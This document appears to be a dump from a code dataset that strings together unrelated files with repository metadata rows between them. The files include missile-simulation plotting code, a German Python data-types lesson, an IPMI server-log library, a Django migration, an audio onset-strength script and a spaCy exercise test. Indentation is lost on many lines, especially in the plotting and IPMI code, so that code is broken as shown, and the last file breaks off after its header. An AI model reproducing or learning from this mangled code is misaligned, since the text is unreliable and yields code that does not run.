        ax_1.plot(res['target']['x'], res['target']['y'], label='Target trajectory')
        ax_2.plot(res['missile']['pos'][:, 2], res['missile']['pos'][:, 0])
        ax_2.plot(res['target']['z'], res['target']['x'])
        ax_3.plot(res['missile']['pos'][:, 2], res['missile']['pos'][:, 1])
        ax_3.plot(res['target']['z'], res['target']['y'])
        ax_1.set_xlabel('$x$, m', fontsize=fontsize, labelpad=labelpad)
        ax_1.set_ylabel('$y$, m', fontsize=fontsize, labelpad=labelpad)
        ax_2.set_xlabel('$z$, m', fontsize=fontsize, labelpad=labelpad)
        ax_2.set_ylabel('$x$, m', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_xlabel('$z$, m', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_ylabel('$y$, m', fontsize=fontsize, labelpad=labelpad)
ax_1.set(title='X0Y')
ax_2.set(title='Z0X')
ax_3.set(title='Z0Y')
ax_1.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_projection.jpg', dpi=dpi)
plt.show()
def plot_motion_parameters(self, figsize=(15, 7), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(2, 2, 1)
ax_2 = fig.add_subplot(2, 2, 2)
ax_3 = fig.add_subplot(2, 2, 3)
ax_4 = fig.add_subplot(2, 2, 4)
ax_1.plot(self.missile.history['t'], self.missile.history['v_abs'], label='$V(t)$')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['thetta']), label='θ')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['psi']), label='ψ')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['gamma']), label='γ')
ax_3.plot(self.missile.history['t'], self.missile.history['qw'], label='$q_w$')
ax_3.plot(self.missile.history['t'], self.missile.history['qx'], label='$q_x$')
ax_3.plot(self.missile.history['t'], self.missile.history['qy'], label='$q_y$')
ax_3.plot(self.missile.history['t'], self.missile.history['qz'], label='$q_z$')
ax_4.plot(self.missile.history['t'], self.missile.history['alpha'], label='α')
ax_4.plot(self.missile.history['t'], self.missile.history['betta'], label='β')
ax_4.plot(self.missile.history['t'], self.missile.history['alpha_targeting'], label='α$_{targeting}$')
ax_4.plot(self.missile.history['t'], self.missile.history['betta_targeting'], label='β$_{targeting}$')
        ax_1.set_ylabel('$V$, m/s', fontsize=fontsize, labelpad=labelpad)
        ax_2.set_ylabel('$angle$, deg', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_xlabel('$t$, s', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_ylabel('$q$', fontsize=fontsize, labelpad=labelpad)
        ax_4.set_xlabel('$t$, s', fontsize=fontsize, labelpad=labelpad)
        ax_4.set_ylabel('$angle$, deg', fontsize=fontsize, labelpad=labelpad)
        ax_1.set_title(label='Velocity profile', fontdict={'fontsize': fontsize})
        ax_2.set_title(label='Missile orientation angles', fontdict={'fontsize': fontsize})
        ax_3.set_title(label='Quaternions', fontdict={'fontsize': fontsize})
        ax_4.set_title(label='Control angles', fontdict={'fontsize': fontsize})
ax_1.legend(fontsize=fontsize)
ax_2.legend(fontsize=fontsize)
ax_3.legend(fontsize=fontsize, loc='center left')
ax_4.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
ax_4.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_motion.jpg', dpi=dpi)
plt.show()
def plot_forces_parameters(self, figsize=(15, 7), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(1, 3, 1)
ax_2 = fig.add_subplot(1, 3, 2)
ax_3 = fig.add_subplot(1, 3, 3)
ax_1.plot(self.missile.history['t'], self.missile.history['X'], label='$X$')
ax_1.plot(self.missile.history['t'], self.missile.history['Y'], label='$Y$')
ax_1.plot(self.missile.history['t'], self.missile.history['Z'], label='$Z$')
ax_2.plot(self.missile.history['t'], self.missile.history['Mx'], label='$M_x$')
ax_2.plot(self.missile.history['t'], self.missile.history['My'], label='$M_y$')
ax_2.plot(self.missile.history['t'], self.missile.history['Mz'], label='$M_z$')
ax_3.plot(self.missile.history['t'], self.missile.history['wx'], label='ω$_x$')
ax_3.plot(self.missile.history['t'], self.missile.history['wy'], label='ω$_y$')
ax_3.plot(self.missile.history['t'], self.missile.history['wz'], label='ω$_z$')
        ax_1.set_ylabel('$F$, N', fontsize=fontsize, labelpad=labelpad)
        ax_2.set_ylabel('$M$, N·m', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_ylabel('ω, rad/s', fontsize=fontsize, labelpad=labelpad)
        ax_1.set_xlabel('$t$, s', fontsize=fontsize, labelpad=labelpad)
        ax_2.set_xlabel('$t$, s', fontsize=fontsize, labelpad=labelpad)
        ax_3.set_xlabel('$t$, s', fontsize=fontsize, labelpad=labelpad)
        ax_1.set_title(label='Forces in the body frame', fontdict={'fontsize': fontsize})
        ax_2.set_title(label='Moments in the body frame', fontdict={'fontsize': fontsize})
        ax_3.set_title(label='Angular velocities in the body frame', fontdict={'fontsize': fontsize})
ax_1.legend(fontsize=fontsize)
ax_2.legend(fontsize=fontsize)
ax_3.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_forces.jpg', dpi=dpi)
plt.show()
def _r_(self):
return np.sqrt((self.target.pos[0] - self.missile.pos[0]) ** 2 + \
(self.target.pos[1] - self.missile.pos[1]) ** 2 + \
(self.target.pos[2] - self.missile.pos[2]) ** 2)
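# Usage sketch (illustrative addition; missile_opts is a hypothetical options
# dict whose keys are defined by Missile3D.get_missile):
# gym = GymFlight.make_scenario(missile_opts, scenario_name='standard')
# gym.run()
# gym.plot()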
| 43.602703 | 140 | 0.591335 |
b527465b85022ddc4c1c597ff6fb6eb0eeecc481
| 597 |
py
|
Python
|
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
# Whole numbers -> Integer (int)
a = 10
# Floating-point numbers -> Float (float)
b = 4.5
# Character strings -> String (str)
c = "Hello my name is Hase"
d = "and I know nothing."
# Boolean -> Bool (bool)
e = True
f = False
# List -> List (list)
liste = ["Hello",                        # 0
         "World",                        # 1
         2021,                           # 2
         True,                           # 3
         ["list", "in", "the", "list"]   # 4
         ]
# Dictionary -> Dict (dict)
diction = {
    # Key              Value
    "Name": "Jonas",
    "Favorite color": "Green"
}
# Tuple -> Tuple (tuple)
a = (11, "Peter", True)
| 19.258065 | 44 | 0.475712 |
a908548011d6d40b85b7ba95830a1bd21b4442cf
| 11,790 |
py
|
Python
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
# Copyright (C) Microsoft Corporation. All rights reserved.
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from time import strptime
from ipmicmd_library import *
sdr_cachefile_path = "/tmp/sdrcache/"
# Check if the sdrcache directory exists; if not, create it
if not os.path.exists(sdr_cachefile_path):
os.makedirs("/tmp/sdrcache")
def read_server_log_entry(serverid, entryid):
try:
log = read_server_log(serverid, False)
if "members" in log:
if str(entryid) in log["members"]:
entry = log["members"][str(entryid)]
log["members"].clear()
log["members"] = entry
            else:
                # the requested entry id is not present; leave an empty members dict
                log["members"].clear()
except Exception, e:
return set_failure_dict(("read_server_log_entry Exception: {0}".format(e)), completion_code.failure)
return log
def read_server_log(serverid, raw_output=True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48",completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface,completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
readcmd = '-S' + ' ' + filepath + ' ' + 'sel elist'
cmdinterface = interface + ' ' + readcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel elist'
read_log = parse_server_log(cmdinterface, "readserverlog",raw_output)
if read_log is None or not read_log: # Check empty or none
return set_failure_dict("Empty data for readserverlog", completion_code.failure)
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("readserverlog Exception: ", e),completion_code.failure)
return read_log
def read_server_log_with_timestamp(serverid, starttime, endtime,raw_output=True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48", completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface, completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
readcmd = '-S' + ' '+ filepath + ' ' + 'sel elist'
cmdinterface = interface + ' ' + readcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel elist'
start_time = strptime(starttime, '%m/%d/%Y-%H:%M:%S')
end_time = strptime(endtime, '%m/%d/%Y-%H:%M:%S')
if(end_time <= start_time):
return set_failure_dict("Parameter out of range",completion_code.failure)
else:
server_log = parse_read_serverlog_with_timestamp(cmdinterface, "readserverlogwithtimestamp",start_time , end_time,raw_output)
if server_log is None or not server_log: # Check empty or none
return set_failure_dict("Empty data for readserverlogwithtimestamp",completion_code.failure)
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("Exception: ", e), completion_code.failure)
return server_log
def clear_server_log(serverid, raw_output = True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48",completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface,completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
clearcmd = '-S' + ' '+ filepath + ' ' + 'sel clear'
cmdinterface = interface + ' ' + clearcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel clear'
read_log = parse_server_log(cmdinterface, "clearserverlog")
if read_log is None or not read_log: # Check empty or none
return set_failure_dict("Empty data for clearserverlog", completion_code.failure)
if (raw_output):
return read_log
else:
return set_success_dict ()
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("Exception: ", e), completion_code.failure)
def parse_server_log(interface , command,raw_output=True):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return output
read_serverlog = {}
if(output['status_code'] == 0 ):
if raw_output:
return output['stdout']
else:
return generate_collection(output)
else:
error_data = output['stderr']
read_serverlog[completion_code.cc_key] = completion_code.failure
read_serverlog[completion_code.desc] = error_data.split(":")[-1]
return read_serverlog
except Exception, e:
#log.exception("serverLog Command: %s Exception error is: %s ", command, e)
#print "Failed to parse serverlog results. Exception: " ,e
return set_failure_dict(("serverLog: Exception: ",e) , completion_code.failure)
def parse_read_serverlog_with_timestamp(interface , command, starttime, endtime,raw_output=True):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return output
read_serverlog = {}
filtered_serverlog = []
if(output['status_code'] == 0 ):
read_logdata = output['stdout'].split('\n')
read_loglist = filter(None, read_logdata) # Removes empty strings
if(len(read_loglist) > 0):
for log in read_loglist:
# getting each log time and date stamp
datetime_part = log.split('|', 3) # Gets first 3 strings
logtime = datetime_part[1].strip() + datetime_part[2].strip() # combining date and time
logtime_obj = strptime(logtime, '%m/%d/%Y%H:%M:%S')
if (logtime_obj >= starttime) and (logtime_obj <= endtime):
filtered_serverlog.append(log)
else:
if raw_output:
return read_logdata
else:
return generate_collection(output)
            if(len(filtered_serverlog) > 0):
                if raw_output:
                    return "\n".join(filtered_serverlog)
                else:
                    # generate_collection expects the ipmi output dict, not a plain string
                    return generate_collection({'status_code': 0, 'stdout': "\n".join(filtered_serverlog)})
            else:
                print "No logs found in the given time range; returning all the logs"
                return "\n".join(read_loglist)
else:
error_data = output['stderr']
read_serverlog[completion_code.cc_key] = completion_code.failure
read_serverlog[completion_code.desc] = error_data.split(":")[-1]
return read_serverlog
except Exception, e:
#log.exception("serverLog Command: %s Exception error is: %s " ,command ,e)
#print "Failed to parse serverlog results. Exception: " , e
return set_failure_dict(("serverLog: Exception: ",e) , completion_code.failure)
def generate_collection(output):
try:
logRsp = {}
if(output['status_code'] == 0):
sdata = output['stdout'].split('\n')
logRsp["members"]={}
for value in sdata:
if value:
d=''
t=''
tmp={}
for idx, val in enumerate(value.split("|")):
if idx ==0:
tmp["Id"] = str(int(val.strip(), 16))
tmp["RecordId"] = str(int(val.strip(), 16))
if idx == 1:
d = val.strip()
if idx == 2:
t= val.strip()
if idx == 3:
tmp["MessageId"] = val.strip()
if idx == 4:
tmp["Message"] = val.strip()
if idx == 5:
tmp["EntryCode"] = val.strip()
if idx == 6:
tmp["MessageArgs"] = val.strip()
tmp["Name"] = "Blade SEL log entry"
tmp["EntryType"] = "SEL"
tmp["Created"] = d+'T'+t
logRsp["members"].update({tmp["Id"]: tmp })
logRsp[completion_code.cc_key] = completion_code.success
return logRsp
else:
logFailedRsp = {}
errorData = output['stderr'].split('\n')
logFailedRsp[completion_code.cc_key] = completion_code.failure
for data in errorData:
if "Error" in data:
logFailedRsp[completion_code.desc] = data.split(":")[-1]
elif "Completion Code" in data:
logFailedRsp[completion_code.ipmi_code] = data.split(":")[-1]
return logFailedRsp
except Exception, e:
return set_failure_dict(("ServerLog: Exception: ",e) , completion_code.failure)
| 41.957295 | 140 | 0.536302 |
8d5c88c8530781b29f177f0e32a1b2cb1420bfa7
| 6,081 |
py
|
Python
|
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | 46 |
2022-01-08T12:03:24.000Z
|
2022-03-30T08:51:05.000Z
|
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.12 on 2021-06-16 17:33
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('arbeitsstunden', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('isNew', models.BooleanField(default=False)),
('hasShortenedHours', models.BooleanField(default=False)),
('name', models.CharField(default='TESTNUTZER', max_length=256)),
],
),
migrations.CreateModel(
name='costCenter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(max_length=500)),
],
),
migrations.CreateModel(
name='customHours',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customHours', models.IntegerField(null=True)),
('percentege', models.IntegerField(default=100)),
],
),
migrations.CreateModel(
name='project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(blank=True, max_length=500)),
('planedHours', models.IntegerField(blank=True)),
('aktiv', models.BooleanField(default=True)),
('costCenter', models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.costcenter')),
('responsible', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='season',
fields=[
('year', models.IntegerField(primary_key=True, serialize=False)),
('hours', models.IntegerField()),
],
),
migrations.CreateModel(
name='subproject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(max_length=500)),
('voluntary', models.BooleanField(default=False)),
('planed', models.BooleanField(default=True)),
('endDate', models.DateField(blank=True, null=True)),
('planedHours', models.IntegerField(blank=True)),
],
),
migrations.CreateModel(
name='work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hours', models.IntegerField(default=0)),
('description', models.CharField(max_length=500)),
('date', models.DateField()),
('setupDate', models.DateField(default=datetime.date.today)),
('employee', models.ManyToManyField(blank=True, to='arbeitsstunden.account')),
],
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Ausschreibung',
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Beteiligte',
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Projekt',
),
migrations.RemoveField(
model_name='arbeitsstundenausschreibung',
name='Projekt',
),
migrations.RemoveField(
model_name='arbeitsstundenausschreibung',
name='Tags',
),
migrations.RemoveField(
model_name='projekt',
name='Saison',
),
migrations.RemoveField(
model_name='projekt',
name='Verantwortlich',
),
migrations.DeleteModel(
name='Arbeitsbeteiligung',
),
migrations.DeleteModel(
name='Arbeitseinheit',
),
migrations.DeleteModel(
name='Arbeitsstundenausschreibung',
),
migrations.DeleteModel(
name='Projekt',
),
migrations.DeleteModel(
name='Saison',
),
migrations.AddField(
model_name='subproject',
name='parts',
field=models.ManyToManyField(blank=True, to='arbeitsstunden.work'),
),
migrations.AddField(
model_name='subproject',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.project'),
),
migrations.AddField(
model_name='project',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.season'),
),
migrations.AddField(
model_name='project',
name='tags',
field=models.ManyToManyField(blank=True, to='arbeitsstunden.tag'),
),
migrations.AddField(
model_name='customhours',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arbeitsstunden.season'),
),
migrations.AddField(
model_name='customhours',
name='used_account',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arbeitsstunden.account'),
),
]
| 38.487342 | 128 | 0.560763 |
a5c600219c88a633d16d1461b3ea2bb047e75b0b
| 449 |
py
|
Python
|
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""062 - Progressão Aritmética v2
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1_o5XXKh0Ge_AYEklX_SKZ2g0R2GXpMba
"""
p = int(input('Informe o primeiro termo de uma PA: '))
r = int(input('Informe a razão da PA: '))
resultado = str(p)
decimo = p + (10 - 1) * r
while p < decimo:
p += r
resultado += ' → ' + str(p)
print(resultado, end=' → Fim.')
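# Example run: p = 1 and r = 2 give the 10th term 1 + 9*2 = 19, so the program
# prints "1 → 3 → 5 → 7 → 9 → 11 → 13 → 15 → 17 → 19 → Fim."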
| 22.45 | 77 | 0.652561 |
574888371f1e0c4e63827d78bc2f6019c0b9f9e4
| 3,781 |
py
|
Python
|
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
import json
import os
import pathlib
class SettingsManager(object):
PCS_NUM = 'pcs_num'
PCS_LEVEL = 'pcs_level'
ENC_NUM = 'enc_num'
CURRENT_TABLE = 'cur_tbl'
def __init__(self):
# Detect linux/mac vs windows. Fuck solaris.
if os.name == 'posix':
self.settings_path = os.path.expanduser(os.path.join('~', '.5eERrc'))
if os.name == 'nt':
self.settings_path = os.path.expanduser(os.path.join('~', 'AppData', 'Local', 'EncounterRoller5e'))
self.settings_file_path = os.path.join(self.settings_path, 'settings.json')
self.tables_file_path = os.path.join(self.settings_path, 'tables')
settings = self.read_settings_file()
self._num_characters = settings[SettingsManager.PCS_NUM]
self._level_characters = settings[SettingsManager.PCS_LEVEL]
self._encounter_num = settings[SettingsManager.ENC_NUM]
self._current_table = settings[SettingsManager.CURRENT_TABLE]
def read_settings_file(self):
"""Read settings file and return parsed contents.
"""
if not os.path.exists(self.settings_file_path):
self.write_settings_file({
SettingsManager.PCS_NUM: 5,
SettingsManager.PCS_LEVEL: 1,
SettingsManager.ENC_NUM: 1,
SettingsManager.CURRENT_TABLE: None
})
with open(self.settings_file_path, 'r') as settings_file:
settings = json.loads(settings_file.read())
return settings
def write_settings_file(self, settings):
"""Write out modified settings data to settings file.
"""
pathlib.Path(self.settings_path).mkdir(parents=True, exist_ok=True)
with open(self.settings_file_path, 'w') as settings_file:
settings_file.write(json.dumps(settings, indent=4))
def set_setting(self, key, value):
"""Set and save a setting.
It would be more efficient to make all changes and then write once,
but this is simple, it works, and it's incredibly durable.
"""
settings = self.read_settings_file()
settings[key] = value
self.write_settings_file(settings)
@property
def number_of_characters(self):
return self._num_characters
@number_of_characters.setter
def number_of_characters(self, value):
self._num_characters = value
self.set_setting(SettingsManager.PCS_NUM, value)
@property
def level_of_characters(self):
return self._level_characters
@level_of_characters.setter
def level_of_characters(self, value):
self._level_characters = value
self.set_setting(SettingsManager.PCS_LEVEL, value)
@property
def number_of_encounters(self):
        return self._encounter_num
@number_of_encounters.setter
def number_of_encounters(self, value):
self._encounter_num = value
self.set_setting(SettingsManager.ENC_NUM, value)
@property
def current_table(self):
return self._current_table
@current_table.setter
def current_table(self, value):
self._current_table = value
self.set_setting(SettingsManager.CURRENT_TABLE, value)
def set(self, args):
"""Handle the set operation from the command line.
"""
if args.num_characters:
self.number_of_characters = args.num_characters
if args.party_level:
self.level_of_characters = args.party_level
def __str__(self) -> str:
return '\nNumber of Characters:\t{0}\nCharacter Level:\t{1}\nCurrent Table:\t\t{2}'.format(
self.number_of_characters,
self.level_of_characters,
self._current_table
)
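# A minimal usage sketch (hypothetical values; `args` normally comes from argparse):
#   settings = SettingsManager()
#   settings.number_of_characters = 4  # the setter persists to settings.json immediately
#   print(settings)                    # prints the tracked party size, level and current table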
| 35.009259 | 111 | 0.659349 |
93a4b91fd07881d9e84c6505270ab1ca90fb655b
| 1,460 |
py
|
Python
|
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import sys
import glob
import os
import numpy
import pylab
def oss(filename, outdirname):
basename = os.path.basename(filename)
outfilename = os.path.join(outdirname,
os.path.splitext(basename)[0] + "-oss.txt")
if not os.path.exists(outfilename):
cmd = "tempo -m TEST_OSS_FLUX %s" % (filename)
os.system(cmd)
os.rename("onset_strength.txt", outfilename)
return outfilename
def score_oss(ground_onsets, outfilename):
    print(outfilename)
oss = numpy.loadtxt(outfilename)
oss = oss[:,2]
# correction for the 15th order (16 coefficients) FIR filter
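    # (a 15th-order, 16-coefficient linear-phase FIR has a group delay of (16-1)/2 = 7.5
    # samples; the slice below rounds that to 8 - inferred from the comment above)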
oss = oss[8:]
ground = numpy.loadtxt(ground_onsets)
ground_samples = ground * (44100.0/128)
ground_plot = numpy.zeros(len(oss))
height = max(oss)
for gs in ground_samples:
        ground_plot[int(gs)] = height  # cast to int: numpy rejects float indices
pylab.plot(oss)
pylab.plot(ground_plot)
pylab.show()
def main():
indirname = sys.argv[1]
outdirname = sys.argv[2]
if not os.path.exists(outdirname):
os.makedirs(outdirname)
filenames = glob.glob(os.path.join(indirname, "*.wav"))
#pairs = []
for filename in filenames:
#for filename in filenames[:1]:
outfilename = oss(filename, outdirname)
### assume they're all .wav
ground_onsets = filename[:-4] + ".txt"
#pairs.append( (ground_onsets, outfilename) )
score_oss(ground_onsets, outfilename)
main()
| 25.172414 | 64 | 0.647945 |
19564588c71adc73ce9c53e12b3a611121a4bad0
| 410 |
py
|
Python
|
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
# std
# extern
# warp
from warp.workspace import Workspace
# types
__all__ = []
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--session-id', required=True)
parser.add_argument('--target', required=True)
args = parser.parse_args()
ws = Workspace(session_id=args.session_id)
ws.build(args.target, warp_backfill_call=True)
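    # Hypothetical invocation (flag names taken from the parser above, values invented):
    #   python build_pipe.py --session-id abc123 --target my_target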
| 17.083333 | 54 | 0.697561 |
270efca34f3e7d1885851fc74d30e40a777e400f
| 680 |
py
|
Python
|
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert (
len(doc1.ents) == 2 and len(doc2.ents) == 2 and len(doc3.ents) == 2
), "Devem haver duas entidades em cada exemplo."
assert any(
e.label_ == "PERSON" and e.text == "PewDiePie" for e in doc2.ents
), "Você rotulou PERSON corretamente?"
assert any(
e.label_ == "PERSON" and e.text == "Alexis Ohanian" for e in doc3.ents
), "Você rotulou PERSON corretamente?"
__msg__.good(
"Bom trabalho! Após incluir ambos os exemplos nas novas entidades de WEBSITE"
"além de manter as entidades já identificadas como por exemplo PERSON,"
"o modelo está apresentando resultados muito melhores."
)
| 40 | 85 | 0.642647 |
27a2c1e9c8cb8da6ec8f2e6383ccdc2278ba08fe
| 175 |
py
|
Python
|
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
|
[
"Apache-2.0"
] | null | null | null |
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
|
[
"Apache-2.0"
] | null | null | null |
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
